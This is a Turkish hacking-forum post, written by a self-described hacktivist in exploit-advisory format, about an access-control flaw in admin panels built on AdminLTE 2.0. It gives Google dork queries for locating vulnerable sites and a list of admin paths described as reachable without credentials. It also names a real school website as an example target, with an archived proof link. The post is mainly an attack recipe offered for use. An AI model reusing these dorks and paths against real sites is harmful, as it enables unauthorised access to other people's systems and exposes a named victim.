Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: @ F-Online Almsaeed Studio AdminLTE 2 ImproperAuth Vuln
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,386 / 1,386
Deneyim: 46 / 100
Rep Sayısı: 2874
Mesaj Sayısı: 6512
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
@ F-Online Almsaeed Studio AdminLTE 2 ImproperAuth Vuln
05.09.2018 01:20
################################################################################​#################

# Exploit Title : Web Design @ F-Online Almsaeed Studio AdminLTE 2.0 Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/09/2018
# Vendor Homepages : almsaeedstudio.com ~ adminlte.io ~ redwanullah.com
# Tested On : Windows
# Software Information Link by Owner => github.com/almasaeed2010/AdminLTE
# Category : WebApps
# Version : 2.0
# Exploit Risk : Medium
# CWE : CWE-284 [Improper Access Control ] - CWE-287 - [ Improper Authentication ]

################################################################################​#################

# Google Dorks :

intext:''Copyright © 2014-2015 Almsaeed Studio'' Version 2.0

intext:''Development and Design by @ F-Online''

Admin Control Panel Path => /admin/login.php

No Username and Password required. Just enter this directory files after the URL. Successful.

# Exploits :

/admin/documentation/
/admin/pages/calendar.html
/admin/pages/UI/general.html
/admin/pages/UI/icons.html
/admin/pages/UI/log.php
/admin/pages/UI/modals.html
/admin/pages/UI/sliders.html
/admin/pages/UI/timeline.html
/admin/pages/charts/chartjs.html
/admin/pages/charts/flot.html
/admin/pages/charts/inline.html
/admin/pages/charts/morris.html
/admin/pages/examples/blank.html
/admin/pages/examples/invoice-print.html
/admin/pages/examples/invoice.html
/admin/pages/examples/lockscreen.html
/admin/pages/examples/login.html
/admin/pages/forms/advanced.html
/admin/pages/forms/editors.html
/admin/pages/forms/general.html
/admin/pages/layout/boxed.html
/admin/pages/layout/collapsed-sidebar.html
/admin/pages/layout/fixed.html
/admin/pages/layout/rtl.html
/admin/pages/layout/top-nav.html
/admin/pages/mailbox/compose.html
/admin/pages/mailbox/mailbox.html
/admin/pages/mailbox/read-mail.html
/admin/pages/tables/data.html
/admin/pages/tables/simple.html
/admin/pages/widgets.html
/admin/pages/examples/register.html
/admin/pages/examples/login.html
/admin/pages/forms/editors.html
/admin/pages/forms/general.html
/admin/pages/forms/advanced.html

################################################################################​#################

# Example Site => aditmarigsmhsc.edu.bd/admin/pages/calendar.html => [ Proof of Concept ] => archive.is/jXzGu

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi